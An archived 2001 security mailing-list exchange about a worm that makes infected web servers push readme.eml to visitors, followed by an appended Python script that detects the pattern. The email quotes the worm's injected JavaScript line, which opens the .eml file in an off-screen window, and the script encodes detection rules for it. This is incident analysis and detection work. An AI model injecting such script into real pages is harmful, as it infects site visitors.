Re: [unisog] Some more details on the worm

From: Jeffrey Altman (jaltman@columbia.edu)
Date: 09/19/01


Date: Tue, 18 Sep 2001 20:54:51 EDT
From: Jeffrey Altman <jaltman@columbia.edu>
To: "Davis, Matt" <matt.davis@countryfinancial.com>
Subject: Re: [unisog] Some more details on the worm
Message-ID: <CMM.0.90.4.1000860891.jaltman@watsun.cc.columbia.edu>


.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822". On my Windows 2000 system this
will result in a program called

  \WINDOWS\system32\thumbvw.exe

being executed using the Apartment threading model.

- Jeff

> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
>
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
>
> Regards,
> Matt
>
>
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288
> mailto:matt.davis@countryfinancial.com
>

 Jeffrey Altman * Sr. Software Designer
 The Kermit Project @ Columbia University
 http://www.kermit-project.org/
 kermit-support@kermit-project.org

 C-Kermit 8.0 Beta available; includes Secure Telnet and FTP
 using Kerberos, SRP, and OpenSSL. SSH soon to follow.
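As an added illustration of the detection side of the exchange above (this is not code from either message, and the sample pages are constructed rather than captured from a real server), the following Python script scans HTML for the pattern Matt quoted: a `<script>` block that calls `window.open` on a `.eml` file, positioned off the visible desktop with large `top`/`left` values, and tacked on after the closing `</html>` tag. The threshold of 2000 pixels for "off-screen" and the `Finding` structure are assumptions made here, not anything stated in the thread.

```python
import re
from dataclasses import dataclass

# Constructed sample pages for demonstration; not captured from a live host.
CLEAN_PAGE = "<html><body><h1>Campus directory</h1></body></html>\n"
INFECTED_PAGE = (
    "<html><body><h1>Campus directory</h1></body></html>\n"
    '<script language="JavaScript">window.open("readme.eml", null, '
    '"resizable=no,top=6000,left=6000")</script>\n'
)
BENIGN_POPUP = (
    '<html><head><script>window.open("help.html", "help", '
    '"resizable=yes")</script></head><body>Help</body></html>\n'
)

# Matches each <script ...>...</script> block, including multi-line bodies.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Captures the first (URL) argument of window.open("...").
WINDOW_OPEN_RE = re.compile(r"""window\.open\(\s*['"]([^'"]+)['"]""", re.IGNORECASE)
# Captures top=NNN / left=NNN entries from the window-features string.
POSITION_RE = re.compile(r"(top|left)\s*=\s*(\d+)", re.IGNORECASE)
CLOSE_HTML_RE = re.compile(r"</html>", re.IGNORECASE)

OFFSCREEN_PX = 2000  # assumed threshold: far beyond any 2001-era desktop


@dataclass
class Finding:
    target: str        # URL handed to window.open
    offscreen: bool    # window placed outside the visible desktop
    after_close: bool  # script appears after the closing </html> tag


def scan_page(html: str) -> list[Finding]:
    """Return one Finding per window.open call that targets a .eml file."""
    findings: list[Finding] = []
    close = CLOSE_HTML_RE.search(html)
    close_end = close.end() if close else len(html)

    for block in SCRIPT_RE.finditer(html):
        body = block.group(1)
        for call in WINDOW_OPEN_RE.finditer(body):
            target = call.group(1)
            if not target.lower().endswith(".eml"):
                continue  # ordinary pop-ups are not what we are looking for
            # Inspect the window-features string that follows the URL argument.
            features = body[call.end():]
            offscreen = any(
                int(m.group(2)) >= OFFSCREEN_PX for m in POSITION_RE.finditer(features)
            )
            findings.append(
                Finding(
                    target=target,
                    offscreen=offscreen,
                    after_close=block.start() >= close_end,
                )
            )
    return findings


def is_suspicious(html: str) -> bool:
    """True when any script tries to open a .eml file in a hidden window."""
    return any(f.offscreen for f in scan_page(html))


if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE),
                       ("benign popup", BENIGN_POPUP)]:
        print(f"{name:13s} suspicious={is_suspicious(page)} findings={scan_page(page)}")
```

Run it against saved copies of served pages, or feed it the body of HTTP responses from a proxy log; a hit on `offscreen` and `after_close` together is the combination described in the thread, whereas a `.eml` link in ordinary markup only shows up as a plain `Finding` for a human to review.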

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com